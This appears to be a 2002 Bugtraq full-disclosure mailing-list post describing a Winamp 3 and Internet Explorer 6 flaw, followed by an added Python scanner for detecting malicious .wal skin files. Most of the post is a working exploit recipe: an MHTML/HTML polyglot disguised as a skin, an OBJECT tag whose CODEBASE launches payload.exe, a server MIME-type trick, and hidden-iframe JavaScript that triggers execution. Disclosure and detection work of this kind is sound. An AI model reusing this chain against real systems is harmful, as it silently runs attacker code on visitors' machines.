RETRY: newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6

This one was missed by SecurityFocus.
Let's try again.

--
  jelmer


----- Original Message -----
From: "Jelmer" <jelmer@kuperus.xs4all.nl>
To: <bugtraq@securityfocus.com>
Sent: Sunday, August 11, 2002 1:28 AM
Subject: newly released winamp 3 fails to address serious "execution of arbitrary" code issue when combined with MSIE6


> For those of you who have been living under a rock, winamp 3 final was
> released today.
> It features freeform skins, now plays videos, allows you to manage your
> mp3s and a lot more.
>
> Unfortunately they failed to address a pretty serious arbitrary code execution
> vulnerability when combined with
> Internet Explorer that I reported to them and this list earlier concerning
> winamp 2. I haven't heard from them since.
>
> Winamp 3 uses a new skinning system that uses the .wal extension; this skin
> type is also
> opened automatically in MSIE, it doesn't prompt for download and stores the
> file in a known location on the user's hard disk, namely
>
> C:\Program Files\Winamp3\Skins
>
> (when installed in the default location like most people do)
>
> Working Exploit code is available at http://kuperus.xs4all.nl/winamp3.htm
>
> Note that this version DOES NOT use any unpatched MSIE hole to invoke the
> executable and it will continue to work even after Microsoft patches its
> browser.
> As I understand it this is just the way the object tag behaves in the local
> zone. (which seems very very dangerous to me)
> I also updated the winamp2 exploit code at
> http://kuperus.xs4all.nl/winamp.htm
>
>
>
> Ok, to encourage winamp/aol to take their customers' security a bit more
> seriously, here's "the recipe" for how it's done.
> It's kind of "http-equiv-esque" in length and obscurity and may not be for the
> faint of heart.
>
> It's written from the top of my head, so please forgive me if I missed a
> brace or dot here and there, here goes.
>
> create a directory c:\exploit
> place an exe file in it, let's call it payload.exe
> then create a file called exploit.htm and give it the following contents
>
> <html>
> <body>
> <img src="payload.exe">
> </body>
> </html>
>
> open the file in Internet Explorer, choose File > Save As, and save it as
> exploit.mht
>
> open it in Notepad and add the following line to the top: <html
> style="display:none;">
>
> so it looks like this :
>
> <html style="display:none;">
> From: <Saved by Microsoft Internet Explorer 5>
> Subject:
> Date: Mon, 5 Aug 2002 18:30:03 +0200
> MIME-Version: 1.0
>
>
> Then look for the body section of this html document (it looks a little
> mangled)
> delete everything between the body tags and place an object tag in its
> place, so it looks like this
>
> <META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR></HEAD>
> <BODY>
> <OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
> CODEBASE="mhtml:file:///C:/Program%20Files/winamp3/Skins/amp.wal!file:///c:/exploit/payload.exe"></OBJECT>
> </BODY></HTML>
>
> this is the code that will later be used to invoke our executable
>
> What we have done is we have slightly altered the mht file so that it can be
> viewed both as an html and as an mht file.
> Files starting with an <html> tag are always seen as html files in Internet
> Explorer. (which can be a pain, as will be described as follows)
>
> ok we are set to go, now we want to place this on the user's hard disk.
> We know wal files are opened automatically by winamp3 and placed in a known
> location, so we'll rename our exploit.mht file to wal
>
> Unfortunately Internet Explorer disrespects mime types, so by having added an
> <html> tag to the mht file it tries to open it as an <html> file.
> The only way I found around this is to set the mime type to a value MSIE
> doesn't know. I chose x-foo/x-bar
> If you are using Apache you can add the following to your mime.types file
>
> x-foo/x-bar                     wal
>
> this means that the webserver will pass this mime type along with every file
> requested ending in .wal
>
> when we now request this file it will be opened by winamp3 and an
> error message will follow shortly,
> however at that time it is already too late, our exploit.wal file has been
> placed in
>
> C:\Program Files\Winamp3\Skins\exploit.wal
>
> now all that remains is bringing it together by making the following
> sequence of events occur
>
> 1. download our exploit.wal
> 2. wait a few seconds for it to finish downloading, then call exploit.wal as
> html file (the file also doubles as mht file and the object tag included in
> the html portion points to itself as the codebase)
>
> here's the code for this
>
> <html>
>
> <body>
>
> Waiting for 5 seconds..
>
> <!-- download our renamed mht file and place it on the users disk -->
> <iframe src="amp.wal" style="display:none"></iframe>
>
> <script language="javascript">
>
> //wait for 5 seconds
>
> setTimeout("ExecuteFile()",5000);
>
>
> function ExecuteFile() {
>
>  // open the saved wal file as html file
>  // oddly when called from disk it didn't open it as html file so we need to
>  // force this behaviour by using a modeless dialog
>
>  sHTML = 'file:///C:/Program%20Files/Winamp3/Skins/amp.wal';
>     sFeatures = 'dialogLeft: 0px; dialogTop: 0px; dialogWidth: 0px; dialogheight: 0px; status:no; unadorned:yes; help:no';
>     vReturnValue = window.showModelessDialog(sHTML, '', sFeatures)
> }
>
> </script>
>
> </body>
> </html>
>
>
> have fun
>
> --
>   jelmer
>
>
>
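A defender-side check for the kind of dropped file described above, added here as an example and not part of the original post: it flags anything in the Skins directory that is an HTML/MHTML polyglot (an `<html>` lead, MIME headers, an `<OBJECT>` whose CODEBASE uses the `mhtml:` scheme) instead of a ZIP archive, which is what a genuine Winamp 3 .wal skin is. The sample bytes, the all-zero placeholder CLSID, the placeholder target path and the `scan_skins_dir` helper are constructed for this example.

```python
"""Flag .wal "skins" that are really the HTML/MHTML polyglot from the post."""
import io
import re
import zipfile
from pathlib import Path

ZIP_MAGIC = b"PK\x03\x04"  # a genuine Winamp 3 .wal skin is a ZIP archive

# Each indicator: (regex over the raw bytes, why it is suspicious in a skin)
INDICATORS = [
    (re.compile(rb"\A\s*<html", re.I), "starts with an <html> tag, not a ZIP header"),
    (re.compile(rb"^MIME-Version:", re.I | re.M), "carries MHTML (MIME) headers"),
    (re.compile(rb"Saved by Microsoft Internet Explorer", re.I),
     "carries the marker IE writes into saved .mht files"),
    (re.compile(rb"<object\b[^>]*codebase\s*=\s*[\"']?mhtml:", re.I),
     "<OBJECT> CODEBASE uses the mhtml: scheme"),
]

def inspect_skin(data: bytes) -> dict:
    """Classify the raw bytes of a file found in the Skins directory."""
    hits = [why for pat, why in INDICATORS if pat.search(data)]
    is_zip = data.startswith(ZIP_MAGIC)
    return {"is_zip": is_zip, "hits": hits, "suspicious": bool(hits) or not is_zip}

def scan_skins_dir(skins_dir: str) -> list:
    """Return [(path, verdict)] for every suspicious .wal directly under skins_dir."""
    results = []
    for path in Path(skins_dir).glob("*.wal"):
        verdict = inspect_skin(path.read_bytes())
        if verdict["suspicious"]:
            results.append((str(path), verdict))
    return results

# Constructed sample mirroring the dropped file's shape: placeholder CLSID,
# placeholder target path, no real executable referenced.
POLYGLOT_SAMPLE = (
    b'<html style="display:none;">\r\n'
    b"From: <Saved by Microsoft Internet Explorer 5>\r\n"
    b"MIME-Version: 1.0\r\n\r\n"
    b'<BODY><OBJECT NAME="X" CLASSID="CLSID:00000000-0000-0000-0000-000000000000"\r\n'
    b'CODEBASE="mhtml:file:///C:/Program%20Files/Winamp3/Skins/x.wal!file:///c:/PLACEHOLDER">'
    b"</OBJECT></BODY></HTML>\r\n"
)

def benign_skin_sample() -> bytes:
    """Constructed stand-in for a legitimate skin: a small ZIP archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("skin.xml", "<WinampAbstractionLayer/>")
    return buf.getvalue()
```

Run `scan_skins_dir(r"C:\Program Files\Winamp3\Skins")` on an affected machine to list skin files that fail the ZIP check or carry any of the polyglot markers.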


